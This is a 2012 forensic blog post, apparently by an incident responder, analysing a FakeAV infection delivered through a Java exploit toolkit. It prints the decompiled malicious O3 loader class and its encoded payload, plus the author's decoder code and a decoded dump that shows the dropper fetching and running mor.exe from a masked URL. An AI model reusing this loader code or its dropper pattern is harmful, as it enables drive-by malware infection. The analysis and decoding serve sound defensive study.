Thursday, 9 August 2012

Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits

Let's continue with Part 2 of the series on Java Exploit Toolkits. The following post is a beginner's attempt to deobfuscate an obfuscated jar file (what a tongue twister), and I hope that by posting my attempt others may be able to comment on more efficient ways to conduct this deobfuscation.

The reason I posted Part 1 of this series is that this particular incident was very similar. It was only because of my experience in the previous incident that I was able to quickly identify artifacts of interest in the incident I will now discuss.

Again I received an image of a machine and was notified that antivirus had detected the following file:

 Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n  

I immediately noticed the similarity between this incident and my previous one. I decided to start with the event logs again; however, in this instance I found a single entry and none of the tamper-protection events I had seen in Part 1:

 Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.   

I decided that the next logical step would be creating the directory listing and reviewing what occurred around the time of the alert. Reviewing the directory listing, I did not find any artifacts of interest. Based on my knowledge of the previous incident I then searched the directory listing for .idx files and found the following:

 -A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed  
 -A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx  
 -A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0  
 -A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57  
 -A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245  
 -A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.  
 -A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\deployment.properties  
 -A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

At this point I wasn't sure whether the following .idx files were part of the incident, but I decided, based on the previous incident, that they might be a good place to start:

74367697-78280468.idx

bffc1b9-44cf1245.idx

At this point the URLs discovered in these files definitely looked suspicious, but I still needed more information to decide. I decided the next step was to start looking at some of the other files that I've highlighted in orange above:

74367697-78280468

I exported the file listed above and uploaded it to VirusTotal. Here are the results. Although there were only 3 hits, that was enough for me to gather further suspicion of the file. I renamed the file, adding the .jar extension, and attempted to open it with jd-gui. Unfortunately I didn't have any success. I also attempted to rename the file to .exe and run it through Anubis, but I wasn't able to do that either. At this point I wasn't really sure what my next step could be with the file, so I decided to move on and focus on one of the other files. If anybody has any advice on this file I'd be keen to hear what my next steps might be.

bffc1b9-44cf1245

Again I uploaded the file listed above to VirusTotal to confirm any detections. Here are the results. At this point I was fairly sure that I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with jd-gui. SUCCESS! Here is the initial view I had when opening the file in jd-gui:

I reviewed each of the classes above. The first two basically seemed like obfuscation and padding techniques to avoid antivirus, so I decided to spend my time focusing on O3. Below is what I reviewed when opening O3:


 import java.lang.reflect.Method;  
 import java.net.URL;  
 import java.security.CodeSource;  
 import java.security.Permissions;  
 import java.security.ProtectionDomain;  
 import java.security.cert.Certificate;  
 class O3 extends ClassLoader  
 {  
  static ProtectionDomain pd;  
  public static char char_at(String paramString, int paramInt)  
  {  
   return paramString.charAt(paramInt);  
  }  
  public static Method get_func(Class paramClass) throws Exception  
  {  
   return paramClass.getClass().getMethod("newInstance", new Class[0]);  
  }  
  public static void invoke(Method paramMethod, Class paramClass) throws Exception  
  {  
   paramMethod.invoke(paramClass, new Object[0]);  
  }  
  public static String get_perm_name()  
  {  
   return new StringBuffer("setSec").toString() + "urityManager";  
  }  
  public static byte[] string_to_bytes(String paramString)  
  {  
   byte[] arrayOfByte = new byte[paramString.length() / 2];  
   try  
   {  
    Permissions localPermissions = new Permissions();  
    localPermissions.add(new RuntimePermission(get_perm_name()));  
    pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);  
   }  
   catch (Exception localException) {  
   }  
   int i = paramString.length();  
   for (int j = 0; j < i; j += 2)  
   {  
    int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
    k = (k - 3) % 256;  
    arrayOfByte[(j / 2)] = (byte)k;  
   }  
   return arrayOfByte;  
  }  
  public static void load(O3 paramO3)  
  {  
   try  
   {  
    int i = 1;  
    String[] arrayOfString = { "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", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "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" };  
    StringBuilder localStringBuilder = new StringBuilder();  
    for (int j = 0; j < arrayOfString.length; j++)  
    {  
     localStringBuilder.append(arrayOfString[j]);  
    }  
    byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
    Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);  
    invoke(get_func(localClass), localClass);  
   }  
   catch (Exception localException)  
   {  
   }  
  }  
 }  

From what I can gather, this class file builds an array of strings (which I've highlighted in red), concatenates them, and passes the result to the public static byte[] string_to_bytes(String paramString) method, which decodes it into the bytes that are then handed to defineClass. At this point I was pretty lost, but I wanted to attempt to deobfuscate the string in the hope that it might provide me with a better understanding and potentially some new artifacts to search for within my image.

I decided to create my own Java application based on the class above. It would be a good chance for me to dust off some of the Java skills that I'd so happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE, which I was familiar with.

I created the following class based on the output above; again, I'm sure there are more efficient ways of doing this. My aim was to create a text file containing the deobfuscated text. My class is as follows:

 import java.lang.reflect.Method;  
 import java.io.*;  
 public class exploitMain {  
   /**  
    * @param args  
    */  
   public static void main(String[] args) {  
     load();  
   }  
   public static char char_at(String paramString, int paramInt)  
    {  
     return paramString.charAt(paramInt);  
    }  
   // Same decoder as in O3: each pair of hex digits is one byte, then 3 is subtracted (mod 256)
   public static byte[] string_to_bytes(String paramString)  
    {  
     byte[] arrayOfByte = new byte[paramString.length() / 2];  
     int i = paramString.length();  
     for (int j = 0; j < i; j += 2)  
     {  
      int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
      k = (k - 3) % 256;   // goes negative for 0x00-0x02, but the cast to byte wraps it correctly  
      arrayOfByte[(j / 2)] = (byte)k;  
     }  
     return arrayOfByte;  
    }  
    public static void load()  
    {  
     try  
     {  
       int i = 1;  
       String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "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" };  
       StringBuilder localStringBuilder = new StringBuilder();  
       for (int j = 0; j < arrayOfString.length; j++)  
       {  
        localStringBuilder.append(arrayOfString[j]);  
       }  
       byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
       //System.out.println(arrayOfByte);  
       String temp = new String();  
       temp = bytesToStringUTFCustom(arrayOfByte);  
       writeToText(temp);  
     }  
     catch (Exception localException)  
     {  
       localException.printStackTrace();  // don't silently swallow the IOException from writeToText  
     }  
    }  
    // Widen each byte to a char so the decoded bytes can be dumped as text  
    // (bytes >= 0x80 sign-extend and end up as '?' in the output file)  
    public static String bytesToStringUTFCustom(byte[] bytes) {  
      char[] buffer = new char[bytes.length];  
      for (int i = 0; i < bytes.length; i++) {  
        buffer[i] = (char) bytes[i];  
      }  
      return new String(buffer);  
    }  
    // Write the decoded text out to a file for review  
    public static void writeToText(String output) throws IOException {  
      File file = new File("c:/output.txt");  
      BufferedWriter bo = new BufferedWriter(new FileWriter(file));  
      bo.write(output);  
      bo.close();  
    }  
 }  

It was rushed, so it's fairly messy and I haven't commented on it. If you want to know anything further about it, please feel free to leave some comments and I'll get back to you as soon as I can. Finally, I reviewed my text file for further information.

 ????  0 ~  
  ' 2  
  3 4  5  
  6 7  8  9  
  6 :  ;  <  =  
  > ?  
        @  
        A  
    B  C  D  E  
    2  F  
  6 G  
    H  I  
    J  
    @  
    K  
    L  M  
  N O  P  Q  R  
    S  
    T  
    T  
  U V  
  U W  X  Y  Z  [   <init>   ()V   Code   LineNumberTable   run   ()Ljava/lang/Object;    
 Exceptions    
 SourceFile   CL4.java  ) *  \  ] ^  'java/security/PrivilegedActionException  _  ` a   http.keepalive   false  b c   java/io/BufferedInputStream   java/net/URL                                                                                                             HTTp://www.XXXXXXX.pro/P4fLBitJ-PxK2/yUA83mE  d  e f  ) g  h i  ) j   java/io/BufferedOutputStream   java/io/FileOutputStream   java/lang/StringBuffer   TEMP  k l  m n   /mor.exe  o f  ) p  q r   00047  s  t u   00116   00120   00074  v w  x *  y  z {  | }   java/lang/Exception   CL4   java/lang/Object  'java/security/PrivilegedExceptionAction   java/security/AccessController   doPrivileged  =(Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object;   java/lang/System   setSecurityManager   (Ljava/lang/SecurityManager;)V   setProperty  8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;   java/lang/String   trim   ()Ljava/lang/String;   (Ljava/lang/String;)V    
 openStream   ()Ljava/io/InputStream;   (Ljava/io/InputStream;)V   getenv  &(Ljava/lang/String;)Ljava/lang/String;   append  ,(Ljava/lang/String;)Ljava/lang/StringBuffer;   toString   (Ljava/io/OutputStream;I)V   read   ([BII)I   java/lang/Integer   parseInt   (Ljava/lang/String;)I   write   ([BII)V   close   java/lang/Runtime    
 getRuntime   ()Ljava/lang/Runtime;   exec  '(Ljava/lang/String;)Ljava/lang/Process; ! & '   (      ) *   +  >       *?  *?  W?  L?                 ,                               
      - .   +  ?      & ?     ? L = >    ?  W?  Y?      Y   
 ?  ?  ?   
 ?  : ?  Y?  Y?  Y?    ?  ?    ?  ?  ?     ?  :   +    ?  Y=? ?  `> 6    ? x  d  `   ?  ? i  d  ` p?  +  \3  ?  ??T? H  d  ` p ?  +  \3  ?  ??T? ,  d  ` p ?  +  \3  ?  ??T?  +  \3  ?  ??T?  ???  +  ? ??g  ? !  ? "? #:   ?  Y?    ?  ?    ?  ?  ? $W?  L ?       # %   ,  n            
            .   X   g ! k " t $ ? & ? ( ? * ? , ? . ? 0 ? 2 ? 6 ? " ? 9 ? ; ? < ? =   >  C # @ $ D /      %   0    1  


It's difficult to make this output easy to read. I've highlighted the areas of interest in red. In particular it shows an additional file and a URL on the same site we'd previously discovered. Overall I was fairly happy to find an additional artifact to search for, which unfortunately I did not find in this instance.
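As an added example (my own code, not the author's class or anything from the toolkit), here is the same hex-minus-3 decoding that string_to_bytes in O3 and in the class above perform, with two checks that make the output above easier to deal with: confirm the decoded bytes start with the Java class-file magic (so the result is saved as a .class file for jd-gui rather than dumped as text), and pull printable ASCII strings out of it the way the strings tool would. SAMPLE_PREFIX is copied from the start of the page's string array; the URL, the drop-path layout and the analyse helper are my constructions. Note that Java's (k - 3) % 256 goes negative for 0x00-0x02 and relies on the cast to byte to wrap, while Python's modulo is already non-negative, so both give the same bytes.

```python
import re
import struct

CLASS_MAGIC = b"\xca\xfe\xba\xbe"   # every Java class file starts with these 4 bytes


def decode_hex_minus3(hexstr: str) -> bytes:
    """Reverse of the toolkit's encoding: hex pair -> byte, then (b - 3) mod 256."""
    raw = bytes.fromhex(hexstr)
    return bytes((b - 3) % 256 for b in raw)


def encode_hex_plus3(data: bytes) -> str:
    """The forward transform; used here only to build a constructed test sample."""
    return bytes((b + 3) % 256 for b in data).hex().upper()


def class_version(data: bytes):
    """Return (major, minor) if data looks like a Java class file, else None."""
    if len(data) < 8 or data[:4] != CLASS_MAGIC:
        return None
    minor, major = struct.unpack(">HH", data[4:8])
    return major, minor


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """Mimic `strings`: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def analyse(chunks: list) -> dict:
    """Concatenate the string array the way O3.load() does, decode, summarise."""
    data = decode_hex_minus3("".join(chunks))
    return {"version": class_version(data),
            "strings": printable_strings(data),
            "class_file": data}   # write this out with a .class extension for jd-gui


# First 11 bytes of the real encoded array from the page: magic, version 0.48, pool count.
SAMPLE_PREFIX = "CD01BDC10303033303810D"

# Constructed stand-in for a decoded class: header, then a space-padded URL and a drop
# path. The toolkit's long "2323..." runs decode to 0x20 spaces, which explains the
# whitespace before the URL in the dump above and the reference to String.trim().
CONSTRUCTED_PAYLOAD = (CLASS_MAGIC + b"\x00\x00\x00\x30" + b"\x00\x01"
                       + b" " * 16 + b"http://example.invalid/stage2"
                       + b"\x00" + b"/mor.exe")

if __name__ == "__main__":
    print(class_version(decode_hex_minus3(SAMPLE_PREFIX)))          # (48, 0)
    result = analyse([encode_hex_plus3(CONSTRUCTED_PAYLOAD)])
    print(result["version"], [s.strip() for s in result["strings"]])
```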

I hope you find this useful, and hopefully some of you may comment on more efficient ways of doing what I've done above. I would love any advice from anyone who does this on a more regular basis.

1 comment:

  1. > It's difficult to make this output easy to read

    Wha-ha-ha, obviously, you got another class file as output. Lucky you, it had string constants defined as plain text.
